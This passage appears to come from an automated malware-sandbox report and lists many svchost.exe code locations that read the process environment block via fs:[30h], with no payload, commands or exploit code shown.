                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E47A0 mov eax, dword ptr fs:[00000030h]2_2_034E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
